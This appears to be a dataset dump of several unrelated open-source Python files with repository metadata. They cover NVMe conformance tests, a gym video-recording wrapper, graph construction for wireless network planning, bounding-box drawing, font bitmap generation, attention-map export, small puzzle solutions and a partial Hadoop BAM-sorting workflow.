predicate_data","repo_name":"bmontambault/pixal_vis","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6193651709","text":"import time\nimport pytest\nimport logging\n\nfrom nvme import Controller, Namespace, Buffer, Qpair, Pcie, Subsystem\n\n\ndef test_getlogpage_page_id(nvme0, buf):\n for lid in (1, 2, 3):\n nvme0.getlogpage(lid, buf).waitdone()\n\n for lid in (0, 0x6f, 0x7f):\n with pytest.warns(UserWarning, match=\"ERROR status: 01/09\"):\n nvme0.getlogpage(lid, buf).waitdone()\n \n\n@pytest.mark.parametrize(\"repeat\", range(32))\ndef test_getlogpage_invalid_numd(nvme0, repeat):\n dts = nvme0.mdts//4 + 1 + repeat\n buf = Buffer(dts*4)\n\n for lid in (1, 2, 3):\n with pytest.warns(UserWarning, match=\"ERROR status: 00/02\"):\n nvme0.getlogpage(lid, buf).waitdone()\n\n\ndef test_getlogpage_after_error(nvme0, nvme0n1, buf, qpair):\n nvme0.getlogpage(1, buf).waitdone()\n assert buf.data(7, 0) == 0\n nvme0n1.write_uncorrectable(qpair, 0, 8).waitdone()\n\n # generate 2 errors\n with pytest.warns(UserWarning, match=\"ERROR status: 02/81\"):\n nvme0n1.read(qpair, buf, 0, 8).waitdone()\n with pytest.warns(UserWarning, match=\"ERROR status: 02/81\"):\n nvme0n1.read(qpair, buf, 0, 8).waitdone()\n\n time.sleep(0.1) # wait error information ready\n nvme0.getlogpage(1, buf).waitdone()\n nerror1 = buf.data(7, 0)\n nerror2 = buf.data(64+7, 64)\n assert nerror1 == nerror2+1\n\n nvme0n1.write(qpair, buf, 0, 8).waitdone()\n \n\n@pytest.mark.parametrize(\"len\", (1, 2, 4))\ndef test_getlogpage_data_unit_read(nvme0, nvme0n1, buf, qpair, len):\n if not nvme0n1.supports(5):\n pytest.skip(\"compare is not support\")\n\n nvme0n1.write(qpair, buf, 0, len).waitdone()\n\n nvme0.getlogpage(2, buf).waitdone()\n nread1 = buf.data(47, 32)\n\n # read\n for i in range(1000):\n nvme0n1.read(qpair, buf, 0, len).waitdone()\n nvme0.getlogpage(2, buf).waitdone()\n nread2 = buf.data(47, 32)\n assert nread2 == nread1+len\n\n # compare\n nvme0n1.read(qpair, buf, 0, len).waitdone() # get correct data\n for i in range(1000):\n nvme0n1.compare(qpair, buf, 0, len).waitdone()\n nvme0.getlogpage(2, buf).waitdone()\n nread3 = buf.data(47, 32)\n assert nread3 == nread2+len\n\n # verify\n if nvme0n1.supports(0xc):\n for i in range(1000):\n nvme0n1.verify(qpair, 0, len).waitdone()\n nvme0.getlogpage(2, buf).waitdone()\n nread4 = buf.data(47, 32)\n assert nread4 == nread3+len \n\n\n@pytest.mark.parametrize(\"len\", (1, 2, 4))\ndef test_getlogpage_data_unit_write(nvme0, nvme0n1, len, buf, qpair):\n if not nvme0n1.supports(5):\n pytest.skip(\"compare is not support\")\n\n nvme0n1.write(qpair, buf, 0).waitdone()\n\n nvme0.getlogpage(2, buf).waitdone()\n nwrite1 = buf.data(63, 48)\n\n for i in range(1000):\n nvme0n1.write(qpair, buf, 0, len).waitdone()\n\n nvme0.getlogpage(2, buf).waitdone()\n nwrite2 = buf.data(63, 48)\n assert nwrite2 == nwrite1+len\n \n for i in range(1000):\n nvme0n1.write_uncorrectable(qpair, 0, len).waitdone()\n\n nvme0.getlogpage(2, buf).waitdone()\n nwrite3 = buf.data(63, 48)\n assert nwrite3 == nwrite2\n\n nvme0n1.write(qpair, Buffer(4096), 0, 8).waitdone()\n \n\ndef test_getlogpage_power_cycle_count(nvme0, subsystem, buf):\n def get_power_cycles(nvme0):\n nvme0.getlogpage(2, buf, 512).waitdone()\n return buf.data(115, 112)\n\n powercycle = get_power_cycles(nvme0)\n subsystem.power_cycle(10)\n nvme0.reset()\n assert get_power_cycles(nvme0) == powercycle+1\n\n\ndef test_getlogpage_namespace(nvme0, buf):\n nvme0.getlogpage(2, buf, nsid=1).waitdone()\n nvme0.getlogpage(2, buf, nsid=0xffffffff).waitdone()\n\n # getlogpage for id=2 nsid can be 0 or 0xffffffff\n nvme0.getlogpage(2, buf, nsid=0).waitdone()\n with pytest.warns(UserWarning, match=\"ERROR status: 00/0b\"):\n nvme0.getlogpage(2, buf, nsid=2).waitdone()\n with pytest.warns(UserWarning, match=\"ERROR status: 00/0b\"):\n nvme0.getlogpage(2, buf, nsid=0xfffffffe).waitdone()\n\n \ndef test_getlogpage_smart_composite_temperature(nvme0):\n smart_log = Buffer()\n \n nvme0.getlogpage(0x02, smart_log, 512).waitdone()\n ktemp = smart_log.data(2, 1)\n logging.debug(\"temperature: %d degreeF\" % ktemp)\n\n # warning with AER\n with pytest.warns(UserWarning, match=\"AER notification is triggered\"):\n # over composite temperature threshold\n nvme0.setfeatures(4, cdw11=ktemp-10).waitdone()\n \n nvme0.getlogpage(0x02, smart_log, 512).waitdone()\n logging.debug(\"0x%x\" % smart_log.data(0))\n nvme0.getlogpage(0x02, smart_log, 512).waitdone() \n assert smart_log.data(0) & 0x2\n\n # higher threshold\n nvme0.setfeatures(4, cdw11=ktemp+10).waitdone()\n\n # aer is not expected\n nvme0.getlogpage(0x02, smart_log, 512).waitdone()\n ktemp = smart_log.data(2, 1)\n logging.debug(\"temperature: %d degreeF\" % ktemp)\n\n # revert to default\n orig_config = 0\n def getfeatures_cb_4(cdw0, status):\n nonlocal orig_config; orig_config = cdw0\n nvme0.getfeatures(4, sel=1, cb=getfeatures_cb_4).waitdone()\n nvme0.setfeatures(4, cdw11=orig_config).waitdone() \n\n \ndef test_getlogpage_persistent_event_log(nvme0):\n if not (nvme0.id_data(261)&0x10):\n pytest.skip(\"feature sv is not supported\")\n\n\ndef test_getlogpage_firmware_slot_info_nsid_1(nvme0, buf):\n \"\"\"For Log Pages with a scope of NVM subsystem or controller (as shown in Figure 191 and Figure 192), the\ncontroller should abort commands that specify namespace identifiers other than 0h or FFFFFFFFh with\nstatus Invalid Field in Command.\"\"\"\n\n nvme0.getlogpage(3, buf, 512, nsid=0).waitdone()\n nvme0.getlogpage(3, buf, 512, nsid=0xffffffff).waitdone()\n with pytest.warns(UserWarning, match=\"ERROR status: 00/02\"):\n nvme0.getlogpage(3, buf, 512, nsid=1).waitdone()\n","repo_name":"catogts/conformance","sub_path":"01_admin/logpage_test.py","file_name":"logpage_test.py","file_ext":"py","file_size_in_byte":5813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71448471926","text":"import os\nimport gym\nfrom typing import Callable\n\nfrom gym import logger\nfrom powderworld.monitoring import video_recorder\n\ndef capped_cubic_video_schedule(episode_id):\n if episode_id < 100:\n return episode_id % 10 == 0\n # return int(round(episode_id ** (1.0 / 3))) ** 3 == episode_id\n else:\n return episode_id % 100 == 0\n\n\nclass RecordVideoWrapper(gym.Wrapper):\n def __init__(\n self,\n env,\n video_folder: str,\n episode_trigger: Callable[[int], bool] = None,\n step_trigger: Callable[[int], bool] = None,\n video_length: int = 0,\n name_prefix: str = \"rl-video\",\n wandb = None,\n ):\n super(RecordVideoWrapper, self).__init__(env)\n\n if episode_trigger is None and step_trigger is None:\n episode_trigger = capped_cubic_video_schedule\n\n trigger_count = sum([x is not None for x in [episode_trigger, step_trigger]])\n assert trigger_count == 1, \"Must specify exactly one trigger\"\n\n self.episode_trigger = episode_trigger\n self.step_trigger = step_trigger\n self.video_recorder = None\n\n self.video_folder = os.path.abspath(video_folder)\n # Create output folder if needed\n if os.path.isdir(self.video_folder):\n logger.warn(\n f\"Overwriting existing videos at {self.video_folder} folder (try specifying a different `video_folder` for the `RecordVideo` wrapper if this is not desired)\"\n )\n os.makedirs(self.video_folder, exist_ok=True)\n\n self.name_prefix = name_prefix\n self.step_id = 0\n self.video_length = video_length\n\n self.recording = False\n self.recorded_frames = 0\n self.is_vector_env = getattr(env, \"is_vector_env\", False)\n self.episode_id = 0\n self.wandb = wandb\n\n def reset(self, **kwargs):\n observations = super(RecordVideoWrapper, self).reset(**kwargs)\n if not self.recording and self._video_enabled():\n self.start_video_recorder()\n return observations\n\n def start_video_recorder(self):\n self.close_video_recorder()\n\n video_name = f\"{self.name_prefix}-step-{self.step_id}\"\n if self.episode_trigger:\n video_name = f\"{self.name_prefix}-episode-{self.episode_id}\"\n\n base_path = os.path.join(self.video_folder, video_name)\n self.video_recorder = video_recorder.VideoRecorder(\n env=self.env,\n base_path=base_path,\n metadata={\"step_id\": self.step_id, \"episode_id\": self.episode_id},\n )\n\n self.video_recorder.capture_frame()\n self.recorded_frames = 1\n self.recording = True\n\n def _video_enabled(self):\n if self.step_trigger:\n return self.step_trigger(self.step_id)\n else:\n return self.episode_trigger(self.episode_id)\n\n def step(self, action):\n # This takes a step given an action. If we're recording, we want to pass in record_frames=True so it can record the frames for us.\n self.set_attr('is_recording', self.recording)\n observations, rewards, dones, infos = super(RecordVideoWrapper, self).step(action)\n\n # increment steps and episodes\n self.step_id += 1\n if not self.is_vector_env:\n if dones:\n self.episode_id += 1\n elif dones[0]:\n self.episode_id += 1\n \n if self.recording:\n self.video_recorder.capture_frame()\n self.recorded_frames += 1\n if self.video_length > 0:\n if self.recorded_frames > self.video_length:\n self.close_video_recorder()\n else:\n if not self.is_vector_env:\n if dones:\n self.close_video_recorder()\n elif dones[0]:\n self.close_video_recorder()\n\n elif self._video_enabled():\n self.start_video_recorder()\n\n return observations, rewards, dones, infos\n\n def close_video_recorder(self) -> None:\n if self.recording:\n self.video_recorder.close(self.wandb)\n self.recording = False\n self.recorded_frames = 1\n","repo_name":"kvfrans/powderworld","sub_path":"powderworld/monitoring/record_video_wrapper.py","file_name":"record_video_wrapper.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"76"} +{"seq_id":"41581769032","text":"from collections import Counter\ndef solution(genres, plays):\n totalPlay = {key:0 for key in genres}\n genre_idx = {key:[] for key in genres}\n for i in range(len(plays)):\n totalPlay[genres[i]] += plays[i]\n genre_idx[genres[i]].append([plays[i],i])\n\n sortedPlays = Counter(totalPlay).most_common()\n\n for value in genre_idx.values():\n value.sort(key=lambda x: x[0], reverse=True)\n\n res = []\n for (genre, totalCnt) in sortedPlays:\n res.append(genre_idx[genre][0][1])\n if len(genre_idx[genre]) > 1:\n res.append(genre_idx[genre][1][1])\n return res ","repo_name":"hongii/programmers_python","sub_path":"LV 3/베스트앨범.py","file_name":"베스트앨범.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14225192642","text":"#!/usr/bin/python\r\n\r\nimport sys\r\nimport os\r\nimport logging\r\n\r\nimport igraph as ig\r\nimport numpy as np\r\nimport csv\r\n\r\n# Change to logging.DEBUG, .INFO, .WARNING, .ERROR, .CRITICAL\r\nlog_level = logging.DEBUG\r\nlog_format = \"[%(asctime)s] - {%(module)s:%(lineno)d} - %(levelname)s - %(message)s\"\r\ndatefmt = '%d-%b-%y %H:%M:%S'\r\nlog_fn = 'graph_creation.log'\r\nlogging.basicConfig(filename=log_fn, level=log_level,\r\n format=log_format, datefmt=datefmt)\r\n\r\ndef graph_creation(dataset, print_stats=True):\r\n \"\"\" \r\n Graph creation function, transforming a data set generated via the GRAND tool into a graph. \r\n\r\n Params\r\n ------\r\n dataset : str\r\n Relative path towards the data set\r\n print_stats : bool\r\n Print graph statistics to terminal console\r\n \r\n\r\n Return\r\n ------\r\n g : iGraph\r\n Graph with vertices representing CPE devices and edges representing wireless LOS links\r\n \"\"\"\r\n\r\n if os.path.isfile(dataset):\r\n logging.info(\"Creating graph with data set: \" + dataset)\r\n else:\r\n logging.critical(\"CRITICAL: Input file does not exist\")\r\n return -1\r\n\r\n # Parse input CSV data\r\n nodeA_column = 0\r\n nodeAtype_column = 1\r\n nodeB_column = 2\r\n nodeBtype_column = 3\r\n distance_column = 4\r\n maxbitrate_column = 9\r\n maxpathloss_column = 7\r\n nodeA = []\r\n nodeA_type = []\r\n nodeB = []\r\n nodeB_type = []\r\n weights = []\r\n with open(dataset, 'r') as csvFile:\r\n reader = csv.reader(csvFile)\r\n it = 0\r\n for row in reader:\r\n if it == 0:\r\n it += 1\r\n assert row[nodeA_column] == \"NodeAid\"\r\n assert row[nodeAtype_column] == \"NodeAType\"\r\n assert row[nodeB_column] == \"NodeBid\"\r\n assert row[nodeBtype_column] == \"NodeBType\"\r\n assert row[distance_column] == \"distance\"\r\n assert row[maxbitrate_column] == \"maxbitrate\"\r\n assert row[maxpathloss_column] == \"maxPathLoss\"\r\n continue\r\n try:\r\n nodeA.append(int(row[nodeA_column]))\r\n nodeA_type.append((row[nodeAtype_column]))\r\n nodeB.append(int(row[nodeB_column]))\r\n nodeB_type.append((row[nodeBtype_column]))\r\n weights.append(float(row[distance_column]))\r\n except:\r\n print(\"Error parsing graph data\")\r\n return -1\r\n\r\n # Construct graph\r\n g = ig.Graph()\r\n\r\n # Add single PoP node\r\n g.add_vertices(1)\r\n g.vs[\"id\"] = 0\r\n g.vs[\"type\"] = 'PoP'\r\n\r\n # Add all CPE nodes: igraph ids 1 -> nb_cpe_nodes + 1\r\n nb_cpe_nodes = np.max(nodeA)\r\n cpe_node_id = range(1, nb_cpe_nodes+1)\r\n g.add_vertices(nb_cpe_nodes)\r\n g.vs[1:][\"id\"] = cpe_node_id\r\n g.vs[1:][\"type\"] = 'CPE'\r\n\r\n # Get links between EDGE nodes according to input graph data\r\n edge_links = [(nodeA[i], nodeB[i], weights[i]) for i in range(len(nodeA))]\r\n unique_edge_links = list(set(edge_links))\r\n edges = []\r\n edge_weights = []\r\n\r\n for x in unique_edge_links:\r\n # check if link (A, B) or link (B, A) is already in edges this avoids\r\n # adding a duplicate symmetric edge as the graph is undirected e.g. if\r\n # (0, 104) is already in edges, do not append (104, 0)\r\n edge1 = (x[0], x[1])\r\n edge2 = (x[1], x[0])\r\n if (edge1 not in edges) and (edge2 not in edges):\r\n edges.append(edge1)\r\n edge_weights.append(x[2]) # weights are symmetric\r\n\r\n # Add edges to graph\r\n g.add_edges(edges)\r\n g.es[\"weight\"] = edge_weights \r\n\r\n # Visualize graph\r\n if print_stats:\r\n print(g)\r\n ig.summary(g)\r\n\r\n return g\r\n\r\nif __name__ == '__main__':\r\n\r\n if len(sys.argv) == 2:\r\n graph_creation(sys.argv[1])\r\n else:\r\n print(\"Missing input data\")\r\n print(\"Usage: graph_analysis.py graph_data_file\")\r\n","repo_name":"brdb/fwa-network-modeling-and-planning","sub_path":"core/graph_creation.py","file_name":"graph_creation.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37509447971","text":"import random as rd\nimport numpy as np\nimport cv2\n\nfrom datumaro.components.project import ProjectDataset # project-related things\nfrom datumaro.components.extractor import DatasetItem, Bbox, Polygon, AnnotationType, LabelCategories\nfrom tqdm import tqdm\nfrom collections import defaultdict\nfrom pathlib import Path\nfrom PIL import Image, ImageDraw, ImageFont\nfrom typing import Union\nfrom copy import deepcopy\nfrom dltools.dataset.args import DrawItemArg\n\n\nclass customDataset:\n\n def __init__(self, dataset:ProjectDataset) -> None:\n self.dataset = dataset\n categories = dataset.categories()[AnnotationType.label]\n self._imageDatas = (customDataset.ImageData(item, categories) for item in dataset)\n\n def drawAndExport(self, lineStyle, cornerStyle):\n for imageData in tqdm(self._imageDatas, total=len(self.dataset)):\n imageData.drawItem(lineStyle, cornerStyle).saveImg()\n\n class ImageData:\n colorMap = defaultdict(lambda :(rd.randint(0,64)*4+3,rd.randint(0,64)*4+3,rd.randint(0,64)*4+3))\n try:\n with open(str(self.root/'labelmap.txt'),'r', encoding='utf-8') as f:\n labelmap = f.readlines()\n labelmap = [line.split(':')[0] for line in labelmap]\n labelmap = dict([(line[0], line[1]) for line in labelmap])\n colorMap.update(labelmap)\n print(colorMap)\n except:\n print('label color를 임의로 생성합니다.')\n\n def __init__(self, item:DatasetItem, categories:LabelCategories) -> None:\n self.item = item\n self.lineStyles = ['(d)ot', '(s)olid']\n self.conerStyles = ['(s)harp', '(r)ound']\n self.categories = categories\n self.img = item.image.data\n self.fontscale = max(self.img.shape[:2]*np.array([30/1080, 30/1620]))\n self.thick = int(max([*list(self.img.shape[:2]*np.array([2/1080, 2/1620])),2]))\n self.root = Path(item.image.path[:item.image.path.rfind(item.id)]).parent\n\n def setLabelName(self):\n for anno in self.item.annotations:\n setattr(anno, 'labelName', self.categories[anno.label].name)\n\n def saveImg(self, savePath:Path=None):\n img = self.chgImageOrder(self.img)\n img = Image.fromarray(img.astype(np.uint8))\n imgPath = Path(self.item.id+self.item.image.ext)\n if savePath is None:\n savePath:Path = self.root/'images_draw-label'/imgPath\n savePath.parent.mkdir(exist_ok=True, parents=True)\n img.save(savePath)\n return self\n\n def drawItem(self, lineStyle, cornerStyle):\n for anno in self.item.annotations:\n if isinstance(anno,Bbox):\n self.drawBbox(anno, lineStyle, cornerStyle).drawLabel(anno)\n elif isinstance(anno,Polygon):\n self.drawSeg()\n return self\n\n @staticmethod\n def chgImageOrder(inputImg):\n '''\n RGB to BGR or BGR to RGB\n '''\n img = deepcopy(inputImg)\n if len(img.shape) == 3 and img.shape[2] in {3, 4}:\n img[:, :, :3] = img[:, :, 2::-1]\n return img\n\n @staticmethod\n def getColor(anno:Union[Bbox,Polygon], order='BGR'):\n color = customDataset.ImageData.colorMap[anno.label]\n while len(customDataset.ImageData.colorMap) != len(set(customDataset.ImageData.colorMap.values())):\n del customDataset.ImageData.colorMap[anno.label]\n color = customDataset.ImageData.colorMap[anno.label]\n if order=='BGR':\n return color[::-1]\n elif order=='RGB':\n return color\n else:\n raise AssertionError(f'order 인수를 바르게 입력하세요. 현재 입력={order}')\n\n def drawBbox(self, anno:Bbox, lineStyle, cornerStyle):\n color = self.getColor(anno, 'BGR')\n bbox = [int(i) for i in anno.points]\n if cornerStyle=='r': #round\n self.roundRectangle(self.img,(bbox[0], bbox[1]), (bbox[2], bbox[3]), color, self.thick, linestyle=lineStyle)\n elif cornerStyle=='s': #sharp\n self.rectangle(self.img, (bbox[0], bbox[1]), (bbox[2], bbox[3]), color, self.thick, linestyle=lineStyle)\n else:\n raise AssertionError(f'cornerStyle must be one of {\", \".join(self.conerStyles)}')\n return self\n\n def rectangle(self, img, topleft, bottomright, color, thick, linestyle='solid'):\n if linestyle=='s': #solid\n cv2.rectangle(img, (topleft[0], topleft[1]), (bottomright[0], bottomright[1]), color, thick)\n elif linestyle=='d': #dot\n self.dotLine(img, topleft, (bottomright[0], topleft[1]), color, thick)#top\n self.dotLine(img, (topleft[0],bottomright[1]), (bottomright[0], bottomright[1]), color, thick)#bottom\n self.dotLine(img, topleft, (topleft[0], bottomright[1]), color, thick)#left\n self.dotLine(img, (bottomright[0],topleft[1]), (bottomright[0],bottomright[1]), color, thick)#right\n return self\n \n def roundRectangle(self, img, topleft, bottomright, color, thick, linestyle='solid'):\n if linestyle=='s': #solid\n _line, _ellipsis = cv2.line, cv2.ellipse\n elif linestyle=='d': #dot\n _line, _ellipsis = self.dotLine, self.dotEllipse\n else:\n raise AssertionError(f'linestyle must be one of {\", \".join(self.lineStyles)}')\n\n border_radius = thick*20\n b_h, b_w = int((bottomright[1]-topleft[1])/2), int((bottomright[0]-topleft[0])/2)\n r_y, r_x = min(border_radius,b_h), min(border_radius,b_w)\n\n _line(img, topleft, (bottomright[0]-r_x, topleft[1]), color, thick)#top\n _line(img, (topleft[0]+r_x,bottomright[1]), (bottomright[0]-r_x, bottomright[1]), color, thick)#bottom\n _line(img, topleft, (topleft[0], bottomright[1]-r_y), color, thick)#left\n _line(img, (bottomright[0],topleft[1]+r_y), (bottomright[0],bottomright[1]-r_y), color, thick)#right\n _ellipsis(img, (bottomright[0]-r_x, topleft[1]+r_y), (r_x, r_y), 0, 0, -90, color, thick)#top-right\n _ellipsis(img, (topleft[0]+r_x, bottomright[1]-r_y), (r_x, r_y), 0, 90, 180, color, thick)#bottom-left\n _ellipsis(img, (bottomright[0]-r_x, bottomright[1]-r_y), (r_x, r_y), 0, 0, 90, color, thick)#bottom-right\n return self\n\n @staticmethod\n def dotEllipse(img, center, r, rotation, start, end, color, thick):\n dr = int((end-start)/4.5)\n\n start1 = start\n while np.sign(end-start1)==np.sign(dr):\n end1 = start1+dr\n if np.abs(end-start1)< np.abs(dr):\n end1=end\n cv2.ellipse(img, center, r, rotation, start1, end1, color, thick)\n start1 += 2*dr\n\n @staticmethod\n def dotLine(img, topleft, bottomright, color, thick):\n a = np.sqrt((bottomright[0]-topleft[0])**2+(bottomright[1]-topleft[1])**2)\n if a==0:\n return\n dotgap = thick*10\n b = a/dotgap\n dx = int((bottomright[0]-topleft[0])/b)\n dy = int((bottomright[1]-topleft[1])/b)\n\n x1, y1 = topleft\n while (np.sign(bottomright[0]-x1)==np.sign(dx)) & (np.sign(bottomright[1]-y1)==np.sign(dy)):\n end_x = x1+dx\n end_y = y1+dy\n\n if np.abs(bottomright[0]-end_x) NumPy Array by font\ndef generate_font_bitmaps(chars, font_path, char_size, canvas_size, x_offset, y_offset):\n font_obj = ImageFont.truetype(font_path, char_size)\n bitmaps = list()\n for c in chars:\n bm = draw_char_bitmap(c, font_obj, canvas_size, x_offset, y_offset)\n bitmaps.append(bm)\n return np.array(bitmaps)\n\n\n# NumPy Array -> img\ndef render_fonts_image(x, path, img_per_row):\n num_imgs, w, h = x.shape\n side = int(w)\n width = img_per_row * side\n height = int(np.ceil(float(num_imgs) / img_per_row)) * side\n canvas = np.zeros(shape=(height, width), dtype=np.int16)\n for idx, bm in enumerate(bitmaps):\n x = side * int(idx / img_per_row)\n y = side * int(idx % img_per_row)\n canvas[x: x + side, y: y + side] = bm\n misc.toimage(canvas).save(path)\n return path\n\n\n#Processes a font into a NumPy Format\ndef process_font(chars,font_path,save_path,x_offset = 0,y_offset = 0,mode='target'):\n char_size = 64\n canvas = 80\n if mode == \"source\":\n char_size = char_size * 2\n canvas = canvas * 2\n font_bitmaps = generate_font_bitmaps(chars,font_path,char_size,canvas,x_offset,y_offset)\n _, ext = os.path.splitext(font_path)\n if not ext.lower() in [\".otf\", \".ttf\"]:\n raise RuntimeError(\"unknown font type found %s. only TrueType or OpenType is supported\" % ext)\n _, tail = os.path.split(font_path)\n font_name = \".\".join(tail.split(\".\")[:-1])\n bitmap_path = os.path.join(save_path, \"%s.npy\" % font_name)\n np.save(bitmap_path, font_bitmaps)\n\n\n#Textfile containing characters -> an array of characters\ndef get_chars(path):\n chars = list()\n with open(path) as f:\n for line in f:\n line = \"%s\" %line\n char = line.split()[0]\n chars.append(char)\n return chars\n\n\n#bitmaps = generate_font_bitmaps(chars, font_path, 64, 80, 0, 0)\n#render_fonts_image(bitmaps, './t4.png', 9)\n\n# read from txt file, get a list of characters in UTF8 form\nchars = get_chars('./charsets/top_3000_simplified.txt')\nsave_dir = \"npy_for_matlab\"\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--source_font',type = str, default = None,\n help = 'numpy bitmap for source font')\n parser.add_argument('--target_font',type = str,default = None,\n help = 'numpy bitmap for target font')\n FLAGS = parser.parse_args()\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n if FLAGS.source_font:\n process_font(chars,FLAGS.source_font,save_dir,0,0,mode = 'source')\n elif FLAGS.target_font:\n process_font(chars,FLAGS.target_font,save_dir,0,0,mode = 'target')\n\n\n","repo_name":"dengl11/Chinese-Font-Reconstruction","sub_path":"3_TensorFlow/pre-process2.py","file_name":"pre-process2.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"} +{"seq_id":"6727514346","text":"\"\"\"\r\nThis file runs the main training/val loop\r\n\"\"\"\r\nimport os\r\nimport json\r\nimport sys\r\nimport pprint\r\nimport torch\r\n\r\nsys.path.append(\".\")\r\nsys.path.append(\"..\")\r\n\r\nfrom options.train_options import TrainOptions\r\nfrom models.psp import pSp\r\nfrom models.psp_gansformer import pSpGansformer\r\nfrom configs import data_configs, transforms_config\r\nfrom datasets.images_dataset import ImagesDataset\r\nfrom models.gansformer.training import misc\r\n\r\n\r\ndef main():\r\n\topts = TrainOptions().parse()\r\n\tos.makedirs(opts.exp_dir, exist_ok=True)\r\n\tos.makedirs(opts.exp_dir+\"_out\", exist_ok=True)\r\n\r\n\topts_dict = vars(opts)\r\n\tpprint.pprint(opts_dict)\r\n\r\n\tdevice = opts.device\r\n\r\n\tnet = pSp(opts)\r\n\tnet = net.to(device)\r\n\r\n\tdata = configure_data(opts)\r\n\r\n\tpattern = \"{}_out/{{}}-{{}}.png\".format(opts.exp_dir) \r\n\tfor d in data:\r\n\t\timg = d[0].unsqueeze(0).to(device)\r\n\t\tatt_maps = net.forward(img, return_att=True)\r\n\t\tfor i,att_map in enumerate(att_maps):\r\n\t\t\tatt_map = torch.nn.functional.softmax(att_map, dim=2)\r\n\t\t\tfor j,style_att in enumerate(torch.split(att_map, 1, dim=2)):\r\n\t\t\t\tstyle_att = (style_att - torch.mean(style_att)) / torch.std(style_att)\r\n\t\t\t\tout = style_att.reshape(int(style_att.shape[3]**0.5), int(style_att.shape[3]**0.5)).cpu().detach().numpy()\r\n\t\t\t\tmisc.to_pil(out).save(pattern.format(i,j))\r\n\r\n\tprint(\"done\")\r\n\r\n\r\ndef configure_data(opts):\r\n\tif opts.dataset_type not in data_configs.DATASETS.keys():\r\n\t\tException(f'{self.opts.dataset_type} is not a valid dataset_type')\r\n\r\n\tdataset_args = data_configs.DATASETS[opts.dataset_type]\r\n\ttransforms_dict = transforms_config.EncodeTransforms(opts).get_transforms()\r\n\tdata = ImagesDataset(source_root=opts.exp_dir,\r\n\t\t\t\t\t\t\t\t\ttarget_root=opts.exp_dir,\r\n\t\t\t\t\t\t\t\t\tsource_transform=transforms_dict['transform_source'],\r\n\t\t\t\t\t\t\t\t\ttarget_transform=transforms_dict['transform_test'],\r\n\t\t\t\t\t\t\t\t\topts=opts)\r\n\treturn data\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n\r\n# python scripts/attention_maps.py --dataset_type=ffhq_encode --encoder_type=GradualStyleEncoder --use_attention --exp_dir=experiment/att_maps --start_from_latent_avg --input_nc=3 --output_size=256 --checkpoint_path=experiment/psp_stylegan_attention_ffhq_encode7/checkpoints/best_model.pt","repo_name":"shashankmanjunath/ec523_project","sub_path":"gan_inversion/scripts/attention_maps.py","file_name":"attention_maps.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"16734779793","text":"myFile = open(\"input.txt\", 'r')\nmyList = []\nfor myLine in myFile:\n\tmyLine = int(myLine.strip())\n\tmyList.append((myLine // 3) - 2)\nmyFile.close()\nmyFile2 = open(\"output.txt\", 'w')\nsum = 0\nfor myLine in myList:\n\tsum += myLine\n\tmyFile2.write(str(myLine) + '\\n')\nmyFile2.close()\nprint(sum)","repo_name":"jpieczar/Advent-of-code-2019","sub_path":"day-01/part-01.py","file_name":"part-01.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15627161599","text":"# encoding: utf-8\nimport os\n\nfrom gaeautils.bundle import bundle\nfrom gaeautils.workflow import Workflow\n\n\nclass bamSort(Workflow):\n \"\"\" bamSort \"\"\"\n\n INIT = bundle(bamSort=bundle())\n INIT.bamSort.program = \"hadoop-bam-x.7.0.jar\"\n INIT.bamSort.picard = \"picard.x.1.jar\"\n INIT.bamSort.index_program = ''\n INIT.bamSort.output_format = 'file'\n INIT.bamSort.reducer_num = 0\n # INIT.bamSort.bamindex = False\n \n \n def run(self, impl, dependList):\n impl.log.info(\"step: bamSort!\")\n inputInfo = self.results[dependList[0]].output\n result = bundle(output=bundle(),script=bundle())\n \n #extend program path\n self.bamSort.program = self.expath('bamSort.program')\n self.bamSort.picard = self.expath('bamSort.picard')\n self.bamSort.index_program = self.expath('bamSort.index_program', False)\n\n hadoop_parameter = ''\n if self.hadoop.get('queue'):\n hadoop_parameter += '-D mapreduce.job.queuename={} '.format(self.hadoop.queue)\n hadoop_parameter += '-libjars {} '.format(self.bamSort.picard)\n\n reducer = self.hadoop.reducer_num\n redeuce_per_node = 10\n reducer = int(int(self.hadoop.reducer_num)/redeuce_per_node)\n if self.option.multiSample:\n # if self.hadoop.is_at_TH:\n # redeuce_per_node = 5\n if redeuce_per_node > len(self.sample):\n redeuce_per_node = len(self.sample)\n reducer = int(int(self.hadoop.reducer_num)/redeuce_per_node)\n if self.bamSort.reducer_num > 0:\n reducer = int(self.bamSort.reducer_num)\n \n #global param\n ParamDict = {\n \"PROGRAM\": \"%s jar %s %s\" % (self.hadoop.bin, self.bamSort.program, hadoop_parameter),\n \"REDUCERNUM\":reducer\n }\n\n #script template \n fs_cmd = self.fs_cmd\n cmd = []\n cmd.append(\"%s ${HDFSTMP}\" % fs_cmd.delete)\n cmd.append(\"allparts=\")\n cmd.append(\"%s ${INPUT}/part* |awk '{print $%d}' > ${BAMLIST}\" % (fs_cmd.ls, (not self.hadoop.ishadoop2 and self.hadoop.is_at_TH) and 9 or 8))\n cmd.append('for i in `cat ${BAMLIST}`;do allparts=\"${allparts} $i\";done')\n cmd.append(\"${PROGRAM} sort -F BAM -o ${OUTDIR} --reducers ${REDUCERNUM} ${HDFSTMP} ${allparts} \")\n\n if self.option.multiSample:\n outdir= 